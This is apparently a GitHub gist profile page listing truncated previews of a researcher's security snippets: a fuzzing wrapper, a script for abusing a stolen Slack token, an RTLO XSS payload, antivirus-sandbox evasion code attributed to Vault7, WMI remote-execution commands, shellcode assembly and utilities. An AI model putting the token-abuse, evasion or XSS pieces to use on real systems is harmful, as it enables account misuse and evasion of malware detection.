Skip to content

Instantly share code, notes, and snippets.

View Und3rf10w's full-sized avatar

Und3rf10w

610 followers · 63 following
View GitHub Profile
@Und3rf10w
Und3rf10w / radamsawrapper.sh
Last active August 28, 2018 17:21
Shell function to wrap radamsa against an application that takes one argument
while true; do
testcase=$(echo $2 | radamsa) # AAAA is the sample arguments you're passing to the application you're testing
echo -e "\n\n---TESTCASE---\n$testcase\n\n---OUTPUT---"
./$1 $testcase # tmp is the application to be fuzzed
test $? -gt 0 && break # if the fuzzed application returns anything that's not a 0, then break out of the loop
echo -e "\n---ENDOUTPUT---\n"
echo -e "---ENDCASE---\n"
done
echo -e "\n\n\e[0;31mAPPLICATION CRASHED\n\e[0mHexdump of input below:\n\n"
printf $testcase | hexdump -Cv | tee crash.hexdump # return a hexdump of the crashy input
@Und3rf10w
Und3rf10w / 99-usb.rules
Created September 11, 2018 16:04
Udev Setup script to notify any changes to USB subsystem
# Udev rule in /etc/udev/rules.d/
ACTION=="add", RUN+="/usr/local/bin/udevnotify"
@Und3rf10w
Und3rf10w / post_to_slacks.sh
Created October 8, 2018 13:25
For being a dick when you steal someone's slack token
#!/bin/bash
# Usage: slackpost <token> <channel> <message>
# Enter the name of your slack host here - the thing that appears in your URL:
# https://slackhost.slack.com/
slackhost=
# Stolen apikey
@Und3rf10w
Und3rf10w / reversed_ayyylmao_xss_rtlo
Created October 8, 2018 13:26
dumb rtlo trick for xss
printf "\u202e<tpircs/>('oamlyyyya')trela.wodniw<tpircs>\u202e" | xclip -sel clip
@Und3rf10w
Und3rf10w / API Memcpy.md
Created February 12, 2019 00:16
PSP (AV) Avoidance Snips taken from vault7

Overview

Kaspersky's sandbox environment has been known to have gaps in what it emulates when examining a process. One such example was found while testing a technique found in known-malware. The technique involved copying the first few assembly instructions of target Windows API functions to an executable buffer, then calling a jmp command after executing the copied instructions which would jmp to the rest of the API code. For example:

DWORD dwOldProtect;
BYTE *urlcode = (BYTE*)VirtualAlloc(NULL, 16, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
HMODULE urlmon = LoadLibrary(L"Urlmon.dll");
BYTE* func = (BYTE*)GetProcAddress(urlmon, "URLDownloadToFileW");
memcpy(urlcode, func, 6);  //copy off the first 6 bytes (first few instructions) from the function to our buffer
lpUrlAddr += 6;
@Und3rf10w
Und3rf10w / stresstest.py
Created April 23, 2019 21:05
A python script to generate system load and network connections with the idea to be used for rootkit debugging
#!/usr/bin/python
import socket
import sys
from os import getpid
from multiprocessing import Pool
from multiprocessing import cpu_count
def f(x):
while True:
x*x
@Und3rf10w
Und3rf10w / introspection-query.graphql
Created August 14, 2019 22:45 — forked from craigbeck/introspection-query.graphql
Introspection query for GraphQL
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
@Und3rf10w
Und3rf10w / HowToDetectTechniqueX_Demos.ps1
Created September 6, 2019 22:38 — forked from mattifestation/HowToDetectTechniqueX_Demos.ps1
Demo code from my DerbyCon talk: "How do I detect technique X in Windows?" Applied Methodology to Definitively Answer this Question
#region Attack validations
wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe
Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe
$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
$CimSession | Remove-CimSession
winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword
@Und3rf10w
Und3rf10w / Hello_world.asm
Last active June 24, 2022 21:19
Sektor7 In memory shellcode injeciton from https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md
bits 64
global_start
_start:
jmp short message
print:
pop rsi
xor rax,rax
mov al, 1
@Und3rf10w
Und3rf10w / hexify_file.py
Created October 26, 2019 17:31
Convert a binary file to a hexbyte string
#!/usr/bin/env python3
import binascii
import argparse
from os import path
parser = argparse.ArgumentParser(description ='Convert input raw binary file to a hex byte string')
parser.add_argument('-i', '--input', dest='input_file', required=True, help="The input file to convert")
parser.add_argument('-o', '--output', dest='output_file', required=False, help="The output file to write to")
args = parser.parse_args()